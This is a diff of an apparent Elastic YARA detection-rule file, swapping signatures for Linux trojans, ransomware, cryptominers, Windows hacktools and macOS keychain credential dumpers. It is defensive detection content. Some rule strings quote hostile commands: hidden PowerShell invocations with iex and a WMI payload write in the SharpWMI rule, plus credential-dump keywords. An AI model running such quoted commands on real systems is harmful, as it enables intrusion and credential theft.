"2a1e797d4dd2599b5c67e73e3c909a1803e604edf0b6ba228713ee375ccc9b16" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "5a95d1df94791c8484d783da975bec984fb11653d1f81f6397efd734a042272b" - severity = "100" + fingerprint = "3b53e54dfea89258a116dcdf4dde0b6ad583aff08d626c02a6f1bf0c76164ac7" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "linux" strings: - $a = { 0A 00 89 E1 6A 1C 51 56 89 E1 43 6A 66 58 CD 80 B0 66 B3 04 } + $a = { 03 87 44 24 04 89 44 24 04 8B 04 24 8D 64 24 04 8B 00 9C 83 } condition: all of them } -rule ELASTIC_Linux_Cryptominer_Presenoker_3Bb5533D : FILE MEMORY +rule ELASTIC_Linux_Trojan_Xorddos_8677Dca3 : FILE MEMORY { meta: - description = "Detects Linux Cryptominer Presenoker (Linux.Cryptominer.Presenoker)" + description = "Detects Linux Trojan Xorddos (Linux.Trojan.Xorddos)" author = "Elastic Security" - id = "3bb5533d-4722-4801-9fbb-dd2c916cffc6" - date = "2021-01-12" - modified = "2021-09-16" + id = "8677dca3-e36b-439f-bc55-76d951114020" + date = "2022-09-12" + modified = "2022-10-18" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Cryptominer_Presenoker.yar#L1-L19" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "bbc155c610c7aa439f98e32f97895d7eeaef06dab7cca05a5179b0eb3ba3cc00" - logic_hash = "13bf69ea6bc7df5ba9ebffe67234657f2ecab99e28fd76d0bbedceaf9706a4dd" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Xorddos.yar#L417-L435" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "23813dc4aa56683e1426e5823adc3aab854469c9c0f3ec1a3fad40fa906929f2" + logic_hash = "9902758dfb61e8b60b281f3f51cda8a10d58eb0cc20743f97998d7bcf120c299" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "a3005a07901953ae8def7bd9d9ec96874da0a8aedbebde536504abed9d4191fd" + fingerprint = "4d276b225f412b3879db19546c09d1dea2ee417c61ab6942c411bc392fee8e26" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -71068,61 +71357,57 @@ rule ELASTIC_Linux_Cryptominer_Presenoker_3Bb5533D : FILE MEMORY os = "linux" strings: - $a = { 47 10 74 72 F3 0F 6F 00 66 0F 7E C2 0F 29 04 24 85 D2 F3 0F 6F } + $a = { F2 5E 83 C2 03 8B FF C1 E2 05 9C 83 C5 69 9D 8D 6D 97 03 C2 56 8B 74 } condition: all of them } -rule ELASTIC_Macos_Trojan_Sugarloader_E7E1D99C : FILE MEMORY +rule ELASTIC_Linux_Trojan_Xorddos_Ebce4304 : FILE MEMORY { meta: - description = "Identifies unpacked SugarLoader sample" + description = "Detects Linux Trojan Xorddos (Linux.Trojan.Xorddos)" author = "Elastic Security" - id = "e7e1d99c-355e-4672-9176-d9eb5d2729c4" - date = "2023-10-24" - modified = "2023-10-24" + id = "ebce4304-0a06-454f-ad08-98b323e5b23a" + date = "2022-09-12" + modified = "2022-10-18" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/MacOS_Trojan_SugarLoader.yar#L1-L23" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "3ea2ead8f3cec030906dcbffe3efd5c5d77d5d375d4a54cca03bfe8a6cb59940" - logic_hash = "0689b704add81e8e7968d9dba5f60d45c8791209330f4ee97e218f8eeb22c88f" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Xorddos.yar#L437-L455" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "2e06caf864595f2df7f6936bb1ccaa1e0cae325aee8659ee283b2857e6ef1e5b" + logic_hash = "42fbfc2c2636c2e3a5da5e51c6bf99f6114ec7d00b88371a34e1fdbe81d1264a" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "cfffdab1e603518df48719266f0a2e91763e5ae7c033d4bf7a4c37232aa8eb04" - threat_name = "MacOS.Trojan.SugarLoader" + fingerprint = "20f0346bf021e3d2a0e25bbb3ed5b9c0a45798d0d5b2516b679f7bf17d1b040d" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "macos" + os = "linux" strings: - $seq_process_key = { 44 0F B6 0C 0F 89 C8 99 F7 BF ?? ?? ?? ?? 0F B6 84 17 ?? ?? ?? ?? 4C 21 C6 4C 01 CE 48 01 C6 } - $seq_handshake = { E8 ?? ?? ?? ?? 4C 8D 75 ?? 48 89 DF 4C 89 F6 BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 41 8B 06 C1 C0 ?? 44 21 F8 4C 8D 75 ?? 41 89 06 48 89 DF 4C 89 F6 BA ?? ?? ?? ?? E8 ?? ?? ?? ?? } - $seq_config = { 48 89 F7 48 C1 E7 05 48 29 F7 48 0F BE D1 48 01 FA 89 D6 8A 08 48 FF C0 84 C9 75 ?? EB ?? } - $seq_recieve_msg = { 45 85 FF 74 ?? 45 39 EF BA ?? ?? ?? ?? 41 0F 42 D7 41 8B 3C 24 48 89 DE 31 C9 E8 ?? ?? ?? ?? 41 29 C7 48 01 C3 48 85 C0 7F ?? B8 ?? ?? ?? ?? EB ?? } + $a = { 24 8D 64 24 04 87 54 24 00 56 8B 74 24 04 5E 9D 9C 83 C5 1E 9D 8D } condition: - 3 of ($seq*) + all of them } -rule ELASTIC_Linux_Trojan_Chinaz_A2140Ca1 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Xorddos_073E6161 : FILE MEMORY { meta: - description = "Detects Linux Trojan Chinaz (Linux.Trojan.Chinaz)" + description = "Detects Linux Trojan Xorddos (Linux.Trojan.Xorddos)" author = "Elastic Security" - id = "a2140ca1-0a72-4dcb-bf7c-2f51e84a996b" - date = "2021-01-12" - modified = "2021-09-16" + id = "073e6161-35a3-4e5e-a310-8cc50cb28edf" + date = "2022-09-12" + modified = "2022-10-18" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Chinaz.yar#L1-L19" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "7c44c2ca77ef7a62446f6266a757817a6c9af5e010a219a43a1905e2bc5725b0" - logic_hash = "c9c63114e45b45b1c243af1f719cddc838a06a1f35d65dca6a2fb5574047eff0" - score = 60 - quality = 45 + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Xorddos.yar#L457-L475" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "2e06caf864595f2df7f6936bb1ccaa1e0cae325aee8659ee283b2857e6ef1e5b" + logic_hash = "2c98058add77c55ab68491eec041d7670f726a9ec93258ae7bb8f0e6721b4ca3" + score = 75 + quality = 75 tags = "FILE, MEMORY" - fingerprint = "ac620f3617ea448b2ad62f06490c37200fa0af8a6fe75a6a2a294a7b5b4a634a" + fingerprint = "12d04597fd60ed143a1b256889eefee1f5a8c77f4f300e72743e3cfa98ba8e99" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -71130,56 +71415,57 @@ rule ELASTIC_Linux_Trojan_Chinaz_A2140Ca1 : FILE MEMORY os = "linux" strings: - $a = { C0 53 8B 74 24 0C 8B 5C 24 10 8D 74 26 00 89 C2 89 C1 C1 FA 03 83 } + $a = { F9 83 F8 1F 77 33 80 BC 35 B9 FF FF FF 63 76 29 8B 44 24 14 40 8D } condition: all of them } -rule ELASTIC_Windows_Trojan_Donutloader_F40E3759 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Xorddos_Bef22375 : FILE MEMORY { meta: - description = "Detects Windows Trojan Donutloader (Windows.Trojan.Donutloader)" + description = "Detects Linux Trojan Xorddos (Linux.Trojan.Xorddos)" author = "Elastic Security" - id = "f40e3759-2531-4e21-946a-fb55104814c0" - date = "2021-09-15" - modified = "2022-01-13" + id = "bef22375-0a71-4f5b-bfd1-e2e718b5c36f" + date = "2022-09-12" + modified = "2022-10-18" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Donutloader.yar#L1-L19" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "541a4ca1da41f7cf54dff3fee917b219fadb60fd93a89b93b5efa3c1a57af81d" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Xorddos.yar#L477-L495" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "f47baf48deb71910716beab9da1b1e24dc6de9575963e238735b6bcedfe73122" + logic_hash = "3991ebdb310338516d5fdd137ba2ac63dc870337785a31d59dcad49135f190e5" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "a6b9ccd69d871de081759feca580b034e3c5cec788dd5b3d3db033a5499735b5" + fingerprint = "0128e8725a0949dd23c23addc1158d28c334cfb040aad2b8f8d58f39720c41ef" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $x64 = { 06 B8 03 40 00 80 C3 4C 8B 49 10 49 8B 81 30 08 00 00 } - $x86 = { 04 75 EE 89 31 F0 FF 46 04 33 C0 EB 08 83 21 00 B8 02 } + $a = { C5 35 9D 8D 6D CB 8B 12 9C 83 C5 17 9D 8D 6D E9 6A 04 F7 14 24 FF } condition: - any of them + all of them } -rule ELASTIC_Windows_Trojan_Donutloader_5C38878D : FILE MEMORY +rule ELASTIC_Windows_Hacktool_Sharpshares_88Cdcd52 : FILE MEMORY { meta: - description = "Detects Windows Trojan Donutloader (Windows.Trojan.Donutloader)" + description = "Detects Windows Hacktool Sharpshares (Windows.Hacktool.SharpShares)" author = "Elastic Security" - id = "5c38878d-ca94-4fd9-a36e-1ae5fe713ca2" - date = "2021-09-15" - modified = "2021-01-13" + id = "88cdcd52-9f5b-4ab6-8f20-137c8569d112" + date = "2022-10-20" + modified = "2022-11-24" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Donutloader.yar#L21-L38" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "897880d13318027ac5008fe8d008f09780d6fa807d6cc828b57975443358750c" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Hacktool_SharpShares.yar#L1-L30" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "bbdd3620a67aedec4b9a68b2c9cc880b6631215e129816aea19902a6f4bc6f41" + logic_hash = "85c59b939da6158f931e779c2884cea77b80fab54ee5e157d86afa19f0253db3" score = 75 - quality = 75 + quality = 73 tags = "FILE, MEMORY" - fingerprint = "3b55ec6c37891880b53633b936d10f94d2b806db1723875e4ac95f8a34d97150" + fingerprint = "ae0cf8bbdfecfebf69d718dc0ccc8402ed7f2f949e2b6bab606bbf69aa6c2518" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -71187,28 +71473,39 @@ rule ELASTIC_Windows_Trojan_Donutloader_5C38878D : FILE MEMORY os = "windows" strings: - $a = { 24 48 03 C2 48 89 44 24 28 41 8A 00 84 C0 74 14 33 D2 FF C1 } + $guid = "BCBC884D-2D47-4138-B68F-7D425C9291F9" ascii wide nocase + $print_str0 = "all enabled computers with \"primary\" group \"Domain Computers\"" ascii wide + $print_str1 = "all enabled Domain Controllers (not read-only DCs)" ascii wide + $print_str2 = "all enabled servers excluding Domain Controllers or read-only DCs" ascii wide + $str0 = "(&(objectCategory=computer)(!(userAccountControl:1.2.840.113556.1.4.803:=2)))" ascii wide + $str1 = "(&(objectCategory=computer)(!(userAccountControl:1.2.840.113556.1.4.803:=2))(userAccountControl:1.2.840.113556.1.4.803:=8192))" ascii wide + $str2 = "(&(objectCategory=computer)(!(userAccountControl:1.2.840.113556.1.4.803:=2))(!(userAccountControl:1.2.840.113556.1.4.803:=8192))(!(userAccountControl:1.2.840.113556.1.4.803:=67100867)))" ascii wide + $str3 = "(&(objectCategory=computer)(!(userAccountControl:1.2.840.113556.1.4.803:=2))(operatingSystem=*server*)(!(userAccountControl:1.2.840.113556.1.4.803:=8192))(!(userAccountControl:1.2.840.113556.1.4.803:=67100867)))" ascii wide + $str4 = "servers-exclude-dc" ascii wide + $str5 = "all enabled servers" ascii wide + $str6 = "[w] \\\\{0}\\{1}" ascii wide + $str7 = "[-] \\\\{0}\\{1}" ascii wide condition: - any of them + $guid or all of ($print_str*) or 4 of ($str*) } -rule ELASTIC_Windows_Trojan_Donutloader_21E801E0 : FILE MEMORY +rule ELASTIC_Windows_Hacktool_Sharpwmi_A67D6Fe5 : FILE MEMORY { meta: - description = "Detects Windows Trojan Donutloader (Windows.Trojan.Donutloader)" + description = "Detects Windows Hacktool Sharpwmi (Windows.Hacktool.SharpWMI)" author = "Elastic Security" - id = "21e801e0-b016-48b2-81f5-930e7d3dd318" - date = "2024-01-21" - modified = "2024-02-08" + id = "a67d6fe5-3ce5-4e63-979e-3fb799d9d173" + date = "2022-10-20" + modified = "2022-11-24" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Donutloader.yar#L40-L58" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "c3bda62725bb1047d203575bbe033f0f95d4dd6402c05f9d0c69d24bd3224ca6" - logic_hash = "19ef7bc8c7117024ca72956376954254c36eeb673f9379aa00475f763084a169" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Hacktool_SharpWMI.yar#L1-L27" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "2134a5e1a5eece1336f831a7686c5ea3b6ca5aaa63ab7e7820be937da0678e15" + logic_hash = "de8749951ece8d4798ade4661d531515e12edf8e8606ddc330000d847a66a26c" score = 75 - quality = 75 + quality = 73 tags = "FILE, MEMORY" - fingerprint = "8b971734d471f281e7c48177096359e8f43578a12e42f6203f55d5e79d9ed09d" + fingerprint = "20719ea15d4dee90c95b474689752172a6b6fb941dced81803f9f726ddc26d29" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -71216,64 +71513,65 @@ rule ELASTIC_Windows_Trojan_Donutloader_21E801E0 : FILE MEMORY os = "windows" strings: - $a = { 48 89 45 F0 48 8B 45 F0 48 81 C4 D0 00 00 00 5D C3 55 48 81 EC 60 02 00 00 48 8D AC 24 80 00 00 00 48 89 8D F0 01 00 00 48 89 95 F8 01 00 00 4C 89 85 00 02 00 00 4C 89 8D 08 02 00 00 48 C7 85 } + $guid = "6DD22880-DAC5-4B4D-9C91-8C35CC7B8180" ascii wide nocase + $str0 = "powershell -w hidden -nop -c \"$e=([WmiClass]'{0}:{1}').Properties['{2}'].Value;[IO.File]::WriteAllBytes('{3}',[Byte[]][Int[]]($e-split','))\"" ascii wide + $str1 = "powershell -w hidden -nop -c \"iex($env:{0})\"" ascii wide + $str2 = "SELECT * FROM Win32_Process" ascii wide + $str3 = "DOWNLOAD_URL" ascii wide + $str4 = "TARGET_FILE" ascii wide + $str5 = "SELECT Enabled,DisplayName,Action,Direction,InstanceID from MSFT_NetFirewallRule WHERE Enabled=1" ascii wide + $print_str0 = "This may indicate called SharpWMI did not invoked WMI using elevated/impersonated token." ascii wide + $print_str1 = "[+] Attempted to terminate remote process ({0}). Returned: {1}" ascii wide condition: - all of them + $guid or ( all of ($str*) and 1 of ($print_str*)) } -rule ELASTIC_Windows_Ransomware_Wannacry_D9855102 : FILE MEMORY +rule ELASTIC_Linux_Cryptominer_Ccminer_18Fc60E5 : FILE MEMORY { meta: - description = "Detects Windows Ransomware Wannacry (Windows.Ransomware.WannaCry)" + description = "Detects Linux Cryptominer Ccminer (Linux.Cryptominer.Ccminer)" author = "Elastic Security" - id = "d9855102-56dc-4e4c-9599-82fa52922b95" - date = "2022-08-29" - modified = "2022-09-29" + id = "18fc60e5-680c-4ff6-8a76-12cc3ae9cd3d" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Ransomware_WannaCry.yar#L1-L26" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "0b7878babbaf7c63d808f3ce32c7306cb785fdfb1ceb73be07fb48fdd091fdfb" - logic_hash = "5edf6a42c9f20de3819b46f24be243940b79e7e9004fee3d601794ea0b534cf1" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Cryptominer_Ccminer.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "dbb403a00c75ef2a74b41b8b58d08a6749f37f922de6cc19127a8f244d901c60" + logic_hash = "75db45ccbeb558409ee9398065591472d4aee0382be5980adb9d0fb41e557789" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "f96f2f0eb3cdf6e882adcad06ad10e375412dec99687b3d38d4dbe9bdde52db5" + fingerprint = "461e942fcaf5faba60c3dc39d8089f9d506ff2daacb2a22573fb35bcfee9b6f1" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = "@WanaDecryptor@.exe" wide fullword - $a2 = ".WNCRY" wide fullword - $a3 = "$%d worth of bitcoin" fullword - $a4 = "%d%d.bat" fullword - $a5 = "This folder protects against ransomware. Modifying it will reduce protection" wide fullword - $b1 = { 53 55 56 57 FF 15 D0 70 00 10 8B E8 A1 8C DD 00 10 85 C0 75 6A 68 B8 0B 00 00 FF 15 70 70 00 10 } - $b2 = { A1 90 DD 00 10 53 56 57 85 C0 75 3E 8B 1D 60 71 00 10 8B 3D 70 70 00 10 6A 00 FF D3 83 C4 04 A3 } - $b3 = { 56 8B 74 24 08 57 8B 3D 70 70 00 10 56 E8 2E FF FF FF 83 C4 04 A3 8C DD 00 10 85 C0 75 09 68 88 } + $a = { 00 68 27 52 22 02 02 32 22 22 03 5C 8B AE 00 00 00 48 03 5C } condition: - 5 of ($a*) or 1 of ($b*) + all of them } -rule ELASTIC_Linux_Trojan_Gafgyt_83715433 : FILE MEMORY +rule ELASTIC_Linux_Cryptominer_Ccminer_3C593Bc3 : FILE MEMORY { meta: - description = "Detects Linux Trojan Gafgyt (Linux.Trojan.Gafgyt)" + description = "Detects Linux Cryptominer Ccminer (Linux.Cryptominer.Ccminer)" author = "Elastic Security" - id = "83715433-3dff-4238-8cdb-c51279565e05" + id = "3c593bc3-cb67-41da-bef1-aad9e73c34f7" date = "2021-01-12" modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Gafgyt.yar#L1-L19" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "3648a407224634d76e82eceec84250a7506720a7f43a6ccf5873f478408fedba" - logic_hash = "7a7328322c2c1e128e267e92de0964e78ad9f49b7de8ec69d7f0632c69723a7d" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Cryptominer_Ccminer.yar#L21-L39" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "dbb403a00c75ef2a74b41b8b58d08a6749f37f922de6cc19127a8f244d901c60" + logic_hash = "94a0d33b474b3c60e926eaf06147eb0fdc56beac525f25326448bf2a5177d9c0" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "25ac15f4b903d9e28653dad0db399ebd20d4e9baabf5078fbc33d3cd838dd7e9" + fingerprint = "0a382ef73d3b5d1b1ad223c66fc367cc5b6f2b23a9758002045076234f257dfe" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -71281,27 +71579,28 @@ rule ELASTIC_Linux_Trojan_Gafgyt_83715433 : FILE MEMORY os = "linux" strings: - $a = { 8B 45 08 88 10 FF 45 08 8B 45 08 0F B6 00 84 C0 75 DB C9 C3 55 } + $a = { 20 83 5C DE C2 00 00 00 68 03 5C EB EA 00 00 00 48 03 1C DC } condition: all of them } -rule ELASTIC_Linux_Trojan_Gafgyt_28A2Fe0C : FILE MEMORY +rule ELASTIC_Linux_Backdoor_Bash_E427876D : FILE MEMORY { meta: - description = "Detects Linux Trojan Gafgyt (Linux.Trojan.Gafgyt)" + description = "Detects Linux Backdoor Bash (Linux.Backdoor.Bash)" author = "Elastic Security" - id = "28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd" + id = "e427876d-c7c5-447a-ad6d-5cbc12d9dacf" date = "2021-01-12" modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Gafgyt.yar#L21-L38" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "04bbc6c40cdd71b4185222a822d18b96ec8427006221f213a1c9e4d9c689ce5c" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Backdoor_Bash.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "07db41a4ddaac802b04df5e5bbae0881fead30cb8f6fa53a8a2e1edf14f2d36b" + logic_hash = "fdd066b746416730419787d21eb53fa2ba997679a237d9db3a2e1365d43df892" score = 75 quality = 73 tags = "FILE, MEMORY" - fingerprint = "a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead" + fingerprint = "6cc13bb2591d896affc58f4a22b3463a72f6c9d896594fe1714b825e064b0956" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -71309,200 +71608,220 @@ rule ELASTIC_Linux_Trojan_Gafgyt_28A2Fe0C : FILE MEMORY os = "linux" strings: - $a = { 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F } + $a = { 67 65 44 6F 6B 4B 47 6C 6B 49 43 31 31 4B 54 6F 67 4C 32 56 } condition: all of them } -rule ELASTIC_Linux_Trojan_Gafgyt_Eb96Cc26 : FILE MEMORY +rule ELASTIC_Macos_Creddump_Keychainaccess_535C1511 : FILE MEMORY { meta: - description = "Detects Linux Trojan Gafgyt (Linux.Trojan.Gafgyt)" + description = "Detects Macos Creddump Keychainaccess (Macos.Creddump.KeychainAccess)" author = "Elastic Security" - id = "eb96cc26-e6d6-4388-a5da-2501e6e2ea32" - date = "2021-01-12" - modified = "2021-09-16" + id = "535c1511-5b45-4845-85c1-ec53f9787b96" + date = "2023-04-11" + modified = "2024-08-19" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Gafgyt.yar#L40-L58" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "440318179ba2419cfa34ea199b49ee6bdecd076883d26329bbca6dca9d39c500" - logic_hash = "3d8740a6cca4856a73ea745877a3eb39cbf3ad4ca612daabd197f551116efa04" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/MacOS_Creddump_KeychainAccess.yar#L1-L25" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "c2995263622d62b11db93f7d163a7595e316ec24b51099f434bc5dbd0afefbfe" score = 75 - quality = 75 + quality = 49 tags = "FILE, MEMORY" - fingerprint = "73967a3499d5dce61735aa2d352c1db48bb1d965b2934bb924209d729b5eb162" + fingerprint = "7c103fa75b24cdf322f6c7cf3ec56e8cc2b14666c9d9fb56a4b1a735efaf1b5b" severity = 100 - arch_context = "x86" + arch_context = "x86, arm64" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "macos" strings: - $a = { 49 6E 66 6F 3A 20 0A 00 5E 6A 02 5F 6A 01 58 0F 05 6A 7F 5F } + $strings1 = "uploadkeychain" ascii wide nocase + $strings2 = "decryptkeychain" ascii wide nocase + $strings3 = "dump-generic-password" ascii wide nocase + $strings4 = "keychain_extract" ascii wide nocase + $strings5 = "chainbreaker" ascii wide nocase + $strings6 = "SecKeychainItemCopyContent" ascii wide nocase + $strings7 = "SecKeychainItemCopyAccess" ascii wide nocase + $strings8 = "Failed to get password" ascii wide nocase condition: - all of them + all of ($strings1,$strings2) or $strings4 or all of ($strings3,$strings5) or all of ($strings6,$strings7,$strings8) } -rule ELASTIC_Linux_Trojan_Gafgyt_5008Aee6 : FILE MEMORY +rule ELASTIC_Windows_Vulndriver_Iqvw_B8B45E6B : FILE { meta: - description = "Detects Linux Trojan Gafgyt (Linux.Trojan.Gafgyt)" + description = "Name: iQVW64.SYS, Version: 1.4.0.0" author = "Elastic Security" - id = "5008aee6-3866-4f0a-89bf-bde740baee5c" - date = "2021-01-12" - modified = "2021-09-16" + id = "b8b45e6b-9729-4e0e-ad08-488e1a4306e0" + date = "2022-04-07" + modified = "2022-04-07" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Gafgyt.yar#L60-L78" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "b32cd71fcfda0a2fcddad49d8c5ba8d4d68867b2ff2cb3b49d1a0e358346620c" - logic_hash = "538bae17dcf0298e379f656e1dba794b75af6c7448a23253a51994bde9d30524" - score = 75 - quality = 75 - tags = "FILE, MEMORY" - fingerprint = "6876a6c1333993c4349e459d4d13c11be1b0f78311274c0f778e65d0fabeeaa7" - severity = 100 + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_VulnDriver_Iqvw.yar#L1-L21" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "37c637a74bf20d7630281581a8fae124200920df11ad7cd68c14c26cc12c5ec9" + logic_hash = "b0a8716f550ba231ca7db61bafd6effbc351faa45864f9ebf7be81f63f14a933" + score = 60 + quality = 55 + tags = "FILE" + fingerprint = "eeabf1c506ac6db4de3279a8b03d676f95c6d93dad6ae0173f2adec2dae41b95" + threat_name = "Windows.VulnDriver.Iqvw" + severity = 50 arch_context = "x86" - scan_context = "file, memory" + scan_context = "file" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 50 16 B4 87 58 83 00 21 84 51 FD 13 4E 79 28 57 C3 8B 30 55 } + $original_file_name = { 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 69 00 51 00 56 00 57 00 36 00 34 00 2E 00 53 00 59 00 53 00 00 00 } + $version = 